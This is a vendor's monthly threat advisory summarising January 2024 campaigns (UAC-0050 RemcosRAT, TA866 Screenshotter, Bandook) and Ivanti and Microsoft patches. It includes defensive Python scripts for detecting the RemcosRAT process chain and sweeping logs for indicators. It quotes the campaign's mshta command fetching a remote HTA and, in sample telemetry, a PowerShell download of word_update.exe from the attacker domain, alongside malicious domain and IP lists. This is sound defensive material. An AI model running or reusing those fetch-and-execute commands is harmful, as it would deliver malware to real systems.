Monthly Advisory • 10 MIN READ

January 2024 Threat Advisory – Top 5

by Eleanor Barlow • Jan 2024

SecurityHQ’s monthly threat report, drawn from the advisories it issued in January 2024.

UAC-0050 Group Targets Ukraine Using RemcosRAT

Threat Reference: Global

Risks: Data Breach and Remote Access

Advisory Type: Threats

Priority: Standard

The UAC-0050 group is targeting the Ukrainian government and associated agencies with RemcosRAT, using Windows pipes for inter-process data transfer as an evasion technique. RemcosRAT (Remote Control and Surveillance) gives the threat actor remote control of the infected system, to spy on the victim and steal data.

How the Attack Scenario Works

  • The victim receives a phishing/spam email with an attached .LNK file.
  • The LNK file carries an obfuscated URL at its end and launches MSHTA (the Microsoft HTML Application host) to fetch an HTA file from it, via the command: "c:\windows\system32\mshta.exe" http[:]//new-tech-savvy[.]com/6[.]hta
  • The HTA file contains a VBScript that triggers a PowerShell script to download “word_update.exe” from the attacker’s server.
  • When “word_update.exe” is executed, it launches cmd.exe and passes malicious data to it through a pipe.
  • This eventually results in the launch of explorer.exe with the RemcosRAT payload resident in its memory.
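The chain above leaves a recognisable trail in process-creation telemetry. The Python script below is an added example (not from the original advisory or from SecurityHQ) that runs three detections over a handful of constructed Sysmon Event ID 1 style records: mshta.exe handed an http(s) URL, PowerShell downloading an .exe, and explorer.exe spawned by cmd.exe, reporting the full parent chain for each hit. The PIDs, user path and exact PowerShell command line are assumptions made for the sample; only the mshta/HTA, word_update.exe, cmd.exe pipe and explorer.exe stages come from the advisory.

```python
"""Hunt for the UAC-0050 / RemcosRAT execution chain in Sysmon-style process events."""
import json
import re

# Constructed Sysmon Event ID 1 (process create) records, reduced to the fields the rules need.
# PIDs, the 'victim' profile path and the PowerShell one-liner are assumed for this sample.
# The last two records are benign controls: a user-launched "cmd /c dir" and mshta opening a
# local vendor .hta, neither of which should fire a rule.
SAMPLE_EVENTS = r"""
{"pid": 4100, "ppid": 3200, "image": "C:\\Windows\\explorer.exe", "cmdline": "C:\\Windows\\explorer.exe"}
{"pid": 5120, "ppid": 4100, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "\"c:\\windows\\system32\\mshta.exe\" http://new-tech-savvy.com/6.hta"}
{"pid": 5200, "ppid": 5120, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://new-tech-savvy.com/word_update.exe','C:\\Users\\victim\\AppData\\Local\\Temp\\word_update.exe')"}
{"pid": 5300, "ppid": 5200, "image": "C:\\Users\\victim\\AppData\\Local\\Temp\\word_update.exe", "cmdline": "C:\\Users\\victim\\AppData\\Local\\Temp\\word_update.exe"}
{"pid": 5400, "ppid": 5300, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe"}
{"pid": 5500, "ppid": 5400, "image": "C:\\Windows\\explorer.exe", "cmdline": "C:\\Windows\\explorer.exe"}
{"pid": 6000, "ppid": 4100, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c dir"}
{"pid": 6100, "ppid": 4100, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe C:\\Program Files\\Vendor\\help.hta"}
"""

URL_RE = re.compile(r"https?://", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b|Start-BitsTransfer)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def ancestry(pid: int, by_pid: dict, limit: int = 16) -> str:
    """Walk parent links upward and render 'root > ... > leaf'.

    Caveat: keyed on PID only, so PID reuse on a busy host can splice unrelated
    processes together; a production rule should key on Sysmon's ProcessGuid.
    """
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < limit:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return " > ".join(reversed(chain))


def detect(events: list) -> list:
    """Return (rule, pid, ancestry) tuples for every record that matches a rule."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        name = basename(ev["image"])
        parent = by_pid.get(ev["ppid"])
        parent_name = basename(parent["image"]) if parent else ""
        cmd = ev["cmdline"]
        chain = ancestry(ev["pid"], by_pid)
        # Rule 1: MSHTA pulling an HTA over the network (the LNK stage of the chain).
        if name == "mshta.exe" and URL_RE.search(cmd):
            alerts.append(("mshta_remote_hta", ev["pid"], chain))
        # Rule 2: PowerShell fetching an executable (the word_update.exe download).
        if name in ("powershell.exe", "pwsh.exe") and DOWNLOAD_RE.search(cmd) and ".exe" in cmd.lower():
            alerts.append(("powershell_exe_download", ev["pid"], chain))
        # Rule 3: explorer.exe is normally started by userinit/winlogon, never by cmd.exe;
        # here it is the host that ends up carrying RemcosRAT in memory.
        if name == "explorer.exe" and parent_name == "cmd.exe":
            alerts.append(("explorer_spawned_by_cmd", ev["pid"], chain))
    return alerts


if __name__ == "__main__":
    for rule, pid, chain in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{rule:26} pid={pid:<6} {chain}")
```

The two control records exercise the false-positive side: a plain cmd.exe under explorer.exe and mshta.exe opening a local .hta produce nothing, while the third alert's ancestry string shows the analyst the whole path from the LNK launch down to the hollowed explorer.exe, which is the pivot needed to find word_update.exe on disk.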

Indicators of Compromise (IOCs)

IP Addresses:

  • 194[.]87.31[.]229
  • 46[.]249.58[.]40

Domains/URLs:

  • new-tech-savvy[.]com/6[.]hta
  • new-tech-savvy[.]com/5[.]hta
  • new-tech-savvy[.]com/algo[.]hta
  • new-tech-savvy[.]com/shablon[.]hta
  • new-tech-savvy[.]com/word_update[.]exe
  • new-tech-savvy[.]com/zayava[.]docx
  • new-tech-savvy[.]com/ofer[.]docx

Recommendation

  1. Use advanced email filtering to identify and quarantine spam and phishing mail before it reaches users’ inboxes.
  2. Do not click links or open attachments in emails marked as spam. Read ‘New Wave of Spear Phishing Emails within HTML Attachment- An Analysts View’ and ‘10 Top Tips to Detect Phishing Scams’.
  3. Use network monitoring tools that can detect and block unknown outbound communications and unauthorised remote access.
  4. Where business use does not require them, restrict mshta.exe and other script hosts with application control, since this chain depends on MSHTA to retrieve and run the remote HTA.

Ivanti Released Patch to Fix Critical Vulnerability Affecting Ivanti EPM

Threat Reference: Global

Risks: Remote Code Execution, Arbitrary Code Execution, SQL Injection and Unauthenticated Access.

Advisory Type: Updates/Patches

Priority: Standard

Ivanti has released a security update to fix a critical vulnerability impacting Ivanti EPM. Successful exploitation of this vulnerability could result in Remote Code Execution, Arbitrary Code Execution, SQL Injection and Unauthenticated Access.

Affected products include Ivanti EPM 2021/EPM 2022 prior to SU5.

Notable CVEs

[Critical] – CVE-2023-39336 – CVSS 9.6 – An attacker with access to the internal network can leverage an unspecified SQL injection to execute arbitrary SQL queries and retrieve their output without authentication. This can give the attacker control over machines running the EPM agent, and when the core server is configured to use SQL Express it may lead to Remote Code Execution on the core server itself.

Recommendation

It is recommended to update affected Ivanti EPM 2021 and 2022 installations to the latest patched version (SU5 or later).

Microsoft Released January 2024 Patch Tuesday for 49 Flaws Including 12 Remote Code Execution

Threat Reference:  Global

Risks: Remote Code Execution, Elevation of Privilege, Security Feature Bypass, Information Disclosure, Spoofing and Denial of Service.

Advisory Type: Updates/Patches

Priority: Standard

Microsoft has released its January 2024 Patch Tuesday updates, addressing 49 flaws, including 12 Remote Code Execution vulnerabilities. Successful exploitation of these vulnerabilities could result in Remote Code Execution, Elevation of Privilege, Security Feature Bypass, Information Disclosure, Spoofing and Denial of Service.

Affected products include Windows, Microsoft Office, Visual Studio, .NET, Azure and SQL Server components.

Notable CVEs:

  • [Critical] CVE-2024-0057 – .NET, .NET Framework, and Visual Studio Security Feature Bypass Vulnerability
  • [Critical] CVE-2024-20674 – Windows Kerberos Security Feature Bypass Vulnerability
  • [Critical] CVE-2024-20700 – Windows Hyper-V Remote Code Execution Vulnerability
  • [Important] CVE-2024-0056 – Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability
  • [Important] CVE-2024-20652 – Windows HTML Platforms Security Feature Bypass Vulnerability
  • [Important] CVE-2024-20653 – Microsoft Common Log File System Elevation of Privilege Vulnerability
  • [Important] CVE-2024-20654 – Microsoft ODBC Driver Remote Code Execution Vulnerability
  • [Important] CVE-2024-20655 – Microsoft Online Certificate Status Protocol (OCSP) Remote Code Execution Vulnerability
  • [Important] CVE-2024-20656 – Visual Studio Elevation of Privilege Vulnerability
  • [Important] CVE-2024-20657 – Windows Group Policy Elevation of Privilege Vulnerability
  • [Important] CVE-2024-20658 – Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability
  • [Important] CVE-2024-20660 – Microsoft Message Queuing Information Disclosure Vulnerability
  • [Important] CVE-2024-20661 – Microsoft Message Queuing Denial of Service Vulnerability
  • [Important] CVE-2024-20662 – Windows Online Certificate Status Protocol (OCSP) Information Disclosure Vulnerability
  • [Important] CVE-2024-20663 – Windows Message Queuing Client (MSMQC) Information Disclosure Vulnerability
  • [Important] CVE-2024-20664 – Microsoft Message Queuing Information Disclosure Vulnerability
  • [Important] CVE-2024-20666 – BitLocker Security Feature Bypass Vulnerability
  • [Important] CVE-2024-20672 – .NET Core and Visual Studio Denial of Service Vulnerability
  • [Important] CVE-2024-20676 – Azure Storage Mover Remote Code Execution Vulnerability
  • [Important] CVE-2024-20677 – Microsoft Office Remote Code Execution Vulnerability
  • [Important] CVE-2024-20680 – Windows Message Queuing Client (MSMQC) Information Disclosure Vulnerability
  • [Important] CVE-2024-20681 – Windows Subsystem for Linux Elevation of Privilege Vulnerability
  • [Important] CVE-2024-20682 – Windows Cryptographic Services Remote Code Execution Vulnerability
  • [Important] CVE-2024-20683 – Win32k Elevation of Privilege Vulnerability
  • [Important] CVE-2024-20686 – Win32k Elevation of Privilege Vulnerability
  • [Important] CVE-2024-20687 – Microsoft AllJoyn API Denial of Service Vulnerability
  • [Important] CVE-2024-20690 – Windows Nearby Sharing Spoofing Vulnerability
  • [Important] CVE-2024-20691 – Windows Themes Information Disclosure Vulnerability
  • [Important] CVE-2024-20692 – Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability
  • [Important] CVE-2024-20694 – Windows CoreMessaging Information Disclosure Vulnerability
  • [Important] CVE-2024-20696 – Windows Libarchive Remote Code Execution Vulnerability
  • [Important] CVE-2024-20697 – Windows Libarchive Remote Code Execution Vulnerability
  • [Important] CVE-2024-20698 – Windows Kernel Elevation of Privilege Vulnerability
  • [Important] CVE-2024-20699 – Windows Hyper-V Denial of Service Vulnerability
  • [Important] CVE-2024-21305 – Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability
  • [Important] CVE-2024-21306 – Microsoft Bluetooth Driver Spoofing Vulnerability
  • [Important] CVE-2024-21307 – Remote Desktop Client Remote Code Execution Vulnerability
  • [Important] CVE-2024-21309 – Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
  • [Important] CVE-2024-21310 – Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
  • [Important] CVE-2024-21311 – Windows Cryptographic Services Information Disclosure Vulnerability
  • [Important] CVE-2024-21312 – .NET Framework Denial of Service Vulnerability
  • [Important] CVE-2024-21313 – Windows TCP/IP Information Disclosure Vulnerability
  • [Important] CVE-2024-21314 – Microsoft Message Queuing Information Disclosure Vulnerability
  • [Important] CVE-2024-21316 – Windows Server Key Distribution Service Security Feature Bypass Vulnerability
  • [Important] CVE-2024-21318 – Microsoft SharePoint Server Remote Code Execution Vulnerability
  • [Important] CVE-2024-21319 – Microsoft Identity Denial of Service Vulnerability
  • [Important] CVE-2024-21320 – Windows Themes Spoofing Vulnerability
  • [Important] CVE-2024-21325 – Microsoft Printer Metadata Troubleshooter Tool Remote Code Execution Vulnerability

Recommendation

It is recommended to update all the affected products to the latest available patch version.

Threat Actor TA866 Dropping “Screenshotter” Malware Via Phishing Campaign

Threat Reference: Global

Risks:  Malware

Advisory Type: Threats

Priority: Standard

Security researchers have observed the TA866 threat actor dropping “Screenshotter” malware via a phishing campaign targeting organizations.

How the Attack Scenario Works

  1. The user receives a phishing email containing a malicious URL.
  2. When clicked, the URL leads to a 404 TDS (Traffic Distribution System), which filters incoming traffic and serves a JavaScript file to visitors that pass its checks.
  3. If the user executes the JavaScript file, an MSI package containing the “WasabiSeed” installer is downloaded.
  4. The MSI package executes an embedded VBS script and establishes persistence by creating an autorun entry in the Startup folder. The VBS script then downloads and executes a second MSI file containing the “Screenshotter” malware.
  5. As the name suggests, the malware takes screenshots of the victim’s screen and sends them to the command and control (C2) server. If the attacker finds the screenshots of interest, WasabiSeed downloads the post-exploitation payload AHK Bot, which in turn downloads scripts such as Domain Profiler (which collects Active Directory information) and Stealer Loader (which loads an infostealer in memory).
  6. Stealer Loader then loads the “Rhadamanthys” infostealer, which collects sensitive information such as user credentials from browsers, FTP clients, chat clients, email clients, and VPN configurations.

Indicators of Compromise (IOCs)

IP Addresses:

  • 79[.]137[.]198[.]60
  • 109[.]107[.]173[.]72
  • 89[.]208[.]105[.]255

Domains/URLs:

  • southfirstarea[.]com
  • peak-pjv[.]com
  • otameyshan[.]com
  • thebtcrevolution[.]com
  • annemarieotey[.]com
  • expresswebstores[.]com
  • styleselect[.]com
  • mikefaw[.]com
  • fgpprlaw[.]com
  • duncan-technologies[.]net
  • black-socks[.]org
  • virtualmediaoffice[.]com
  • samsontech[.]mobi
  • footballmeta[.]com
  • gfcitservice[.]net
  • listfoo[.]org
  • duinvest[.]info
  • shiptrax24[.]com
  • repossessionheadquarters[.]org
  • bluecentury[.]org
  • moosdies[.]top

Recommendation

• It is recommended to onboard all your external facing web servers with SecurityHQ SOC to monitor for similar attack techniques.

• SecurityHQ recommends blocking unknown file extensions on the email gateway. Since this chain delivers its JavaScript stage by URL rather than as an attachment, apply the same download controls at the web proxy.

• Deploy Endpoint Detection & Response (EDR) tools to detect the latest malware and suspicious activity on endpoints, including new autorun entries in the Startup folder.

• Monitor your IT infrastructure 24×7 for cyber security attacks and suspicious activities.

New Variant of Bandook Malware Targeting Organizations Globally

Threat Reference: Global

Risks: Malware

Advisory Type: Threat Intel

Priority: Standard

Researchers have identified a new variant of Bandook malware targeting organizations globally. This variant is focused on Windows systems.

How the Attack Scenario Works

  1. The victim receives an email with an attached PDF file.
  2. The PDF contains a shortened URL to download a password-protected .7z archive, together with the password needed to extract it.
  3. After the victim extracts the archive using the provided password and runs its contents, the malware injects its payload into msinfo32.exe.
  4. Once injected, Bandook uses predetermined strings as registry key names, flags and API names for stealthy communication with its C2 server.
  5. These key values are instructions that tell the malware which tasks to perform.
  6. Bandook also creates a registry key containing another control code that enables its payload to establish persistence and maintain access to the compromised device.

Indicators of Compromise (IOCs)

IP Addresses:

  • 77[.]91[.]100[.]237
  • 45[.]67[.]34[.]219

Recommendation

• Monitor the network for the presence of the Indicators of Compromise (IOCs) listed above.

• Ensure access to publicly exposed devices and servers is restricted to known parties. Regularly check publicly exposed assets for vulnerabilities and assess whether the required applications can be reached via VPN instead of directly over the internet.

• Keep all security solutions, operating systems, software, and firmware up to date.

• Ensure network-based and host-based monitoring solutions are in place and configured to highlight any security issues identified, with proper logging.
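The first recommendation above, like the indicator lists in the TA866 and UAC-0050 sections earlier on this page, comes down to one operation: refanging the published indicators and sweeping network logs for them. The Python below is an added example (not the advisory’s own tooling or SecurityHQ’s) that does this over a few constructed proxy log lines. Its indicators are taken from the page’s own IOC lists; the log format, client addresses and the two deliberate near-miss entries are constructed for the sample.

```python
"""Refang the advisory's defanged indicators and sweep constructed proxy logs for them."""
import ipaddress
import re
from urllib.parse import urlsplit

# Indicators copied from the advisory in their published, defanged form
# (a mix of bare IPs, bare domains and URL indicators with paths).
DEFANGED_IOCS = [
    "79[.]137[.]198[.]60",                        # TA866
    "109[.]107[.]173[.]72",                       # TA866
    "southfirstarea[.]com",                       # TA866
    "peak-pjv[.]com",                             # TA866
    "77[.]91[.]100[.]237",                        # Bandook
    "45[.]67[.]34[.]219",                         # Bandook
    "new-tech-savvy[.]com/6[.]hta",               # UAC-0050
    "http[:]//new-tech-savvy[.]com/word_update[.]exe",  # UAC-0050
]

# Constructed proxy log lines: timestamp, client, method, target, status.
# Two deliberate near misses: 45.67.34.21 (a prefix of a listed IP) and a
# look-alike host with a listed domain embedded mid-name. Neither should match.
SAMPLE_LOG = """\
2024-01-17T10:02:11Z 10.0.5.23 GET http://cdn.southfirstarea.com/js/update.js 200
2024-01-17T10:02:19Z 10.0.5.23 CONNECT 77.91.100.237:443 200
2024-01-17T10:02:31Z 10.0.5.41 GET https://www.example.org/ 200
2024-01-17T10:03:40Z 10.0.5.23 GET http://new-tech-savvy.com/word_update.exe 200
2024-01-17T10:04:02Z 10.0.5.41 CONNECT 45.67.34.21:443 200
2024-01-17T10:04:15Z 10.0.5.52 GET http://peak-pjv.com.evil-lookalike.net/ 200
"""


def refang(ioc: str) -> str:
    """Undo common defanging: [.] or (.) -> ., hxxp -> http, [:]// or [://] -> ://."""
    s = ioc.strip().replace("[.]", ".").replace("(.)", ".")
    s = re.sub(r"^hxxps?", lambda m: m.group(0).lower().replace("xx", "tt"), s, flags=re.I)
    return s.replace("[:]//", "://").replace("[://]", "://")


def indicator_host(ioc: str) -> tuple:
    """Reduce an indicator to ('ip', addr) or ('domain', name); URLs collapse to their host."""
    s = refang(ioc)
    if "://" not in s:
        s = "//" + s  # make urlsplit treat a bare host/path as a network location
    host = (urlsplit(s).hostname or "").lower().rstrip(".")
    try:
        return ("ip", str(ipaddress.ip_address(host)))
    except ValueError:
        return ("domain", host)


def build_index(defanged: list) -> tuple:
    ips, domains = set(), set()
    for ioc in defanged:
        kind, value = indicator_host(ioc)
        (ips if kind == "ip" else domains).add(value)
    return ips, domains


def target_host(target: str) -> str:
    """Host part of a proxy target: a full URL, or 'host:port' from a CONNECT line (IPv4 here)."""
    if "://" in target:
        return (urlsplit(target).hostname or "").lower()
    host, _, _port = target.rpartition(":")
    return (host or target).lower()


def matches(host: str, ips: set, domains: set):
    """Exact match for IPs; exact or subdomain match for domains. Never a substring match."""
    if host in ips:
        return host
    for d in domains:
        if host == d or host.endswith("." + d):
            return d
    return None


def sweep(log_text: str, defanged: list = DEFANGED_IOCS) -> list:
    """Return (timestamp, client, matched_indicator) for every log line touching an IOC."""
    ips, domains = build_index(defanged)
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        ts, src, _method, target = parts[:4]
        ioc = matches(target_host(target), ips, domains)
        if ioc:
            hits.append((ts, src, ioc))
    return hits


if __name__ == "__main__":
    for ts, src, ioc in sweep(SAMPLE_LOG):
        print(f"{ts} {src} -> {ioc}")
```

Matching on the parsed host rather than with a substring search is the point of the two near-miss lines: a naive `"45.67.34.21" in line` test would fire on the listed 45[.]67[.]34[.]219, and a naive domain test would fire on the look-alike that merely contains peak-pjv.com. Exact IP equality and a dot-anchored suffix match give the subdomain coverage an analyst wants (cdn.southfirstarea.com) without those false positives.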

Threat Intelligence for the Future

SecurityHQ’s Threat Intelligence team is a cohesive global unit dedicated to cyber threat intelligence. The team researches emerging threats and tracks the activities of threat actors, ransomware groups and campaigns, to stay ahead of potential risks. Beyond this investigative work, the team provides actionable threat intelligence and research that enriches the understanding of SecurityHQ’s customers worldwide. United by a common commitment, the SecurityHQ Threat Intelligence team delivers the insights needed to confidently navigate the intricacies of the cyber security threat landscape.

For more information on these threats, speak to an expert here. Or if you suspect a security incident, you can report an incident here.